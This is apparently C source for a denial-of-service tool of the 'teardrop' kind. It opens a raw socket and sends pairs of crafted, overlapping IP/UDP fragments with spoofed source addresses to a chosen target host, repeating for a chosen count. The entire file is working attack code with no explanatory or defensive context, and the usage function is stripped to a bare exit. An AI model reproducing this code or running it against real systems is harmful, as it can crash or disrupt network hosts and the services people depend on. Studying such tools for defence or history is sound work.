#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define FIX(n)  (n)
#else        
#define FIX(n)  htons(n)
#endif 
#define IP_MF   0x2000
#define IPH     0x14  
#define UDPH    0x8   
#define PADDING 0x1c  
#define MAGIC   0x3   
#define COUNT   0x1   
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv) {
  int one = 1, count = 0, i, rip_sock;
  u_long  src_ip = 0, dst_ip = 0;
  u_short src_prt = 0, dst_prt = 0;
  struct in_addr addr;
  if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    exit(1);
  } 
  if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) {
    exit(1);
  } 
  while ((i = getopt(argc, argv, "s:t:n:")) != EOF) {
    switch (i) {
      case 's':      
       src_prt = (u_short)atoi(optarg);
       break;
      case 't':      
       dst_prt = (u_short)atoi(optarg);
       break;
      case 'n':      
       count   = atoi(optarg);
       break;
      default :
       usage(argv[0]);
       break;     
    }
  } 
  srandom((unsigned)(time((time_t)0)));
  if (!src_prt) src_prt = (random() % 0xffff);
  if (!dst_prt) dst_prt = (random() % 0xffff);
  if (!count)   count   = COUNT;
  addr.s_addr = src_ip;
  addr.s_addr = dst_ip;
  for (i = 0; i < count; i++) {
    send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
    usleep(500);
  }
  return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt) {
  u_char *packet = NULL, *p_ptr = NULL; 
  u_char byte;                 
  struct sockaddr_in sin;      
  sin.sin_family      = AF_INET;
  sin.sin_port        = src_prt;
  sin.sin_addr.s_addr = dst_ip;
  packet = (u_char *)malloc(IPH + UDPH + PADDING);
  p_ptr  = packet;
  bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
  byte = 0x45;              
  memcpy(p_ptr, &byte, sizeof(u_char));
  p_ptr += 2;               
  *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
  p_ptr += 2;
  *((u_short *)p_ptr) = htons(242);  
  p_ptr += 2;
  *((u_short *)p_ptr) |= FIX(IP_MF); 
  p_ptr += 2;
  *((u_short *)p_ptr) = 0x40;        
  byte = IPPROTO_UDP;
  memcpy(p_ptr + 1, &byte, sizeof(u_char));
  p_ptr += 4;                        
  *((u_long *)p_ptr) = src_ip;       
  p_ptr += 4;
  *((u_long *)p_ptr) = dst_ip;       
  p_ptr += 4;
  *((u_short *)p_ptr) = htons(src_prt); 
  p_ptr += 2;
  *((u_short *)p_ptr) = htons(dst_prt); 
  p_ptr += 2;
  *((u_short *)p_ptr) = htons(8 + PADDING);  
  if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
  sizeof(struct sockaddr)) == -1) {
    free(packet);
    exit(1);
  }
  p_ptr = &packet[2];     
  *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
  p_ptr += 4;             
  *((u_short *)p_ptr) = FIX(MAGIC);
  if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
  sizeof(struct sockaddr)) == -1) {
    free(packet);
    exit(1);
  } 
  free(packet);
}
u_long name_resolve(u_char *host_name) {
  struct in_addr addr;
  struct hostent *host_ent;
  if ((addr.s_addr = inet_addr(host_name)) == -1) {
    if (!(host_ent = gethostbyname(host_name))) return (0);
    bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
  }
  return (addr.s_addr);
}
void usage(u_char *name) {
  exit(0);
}
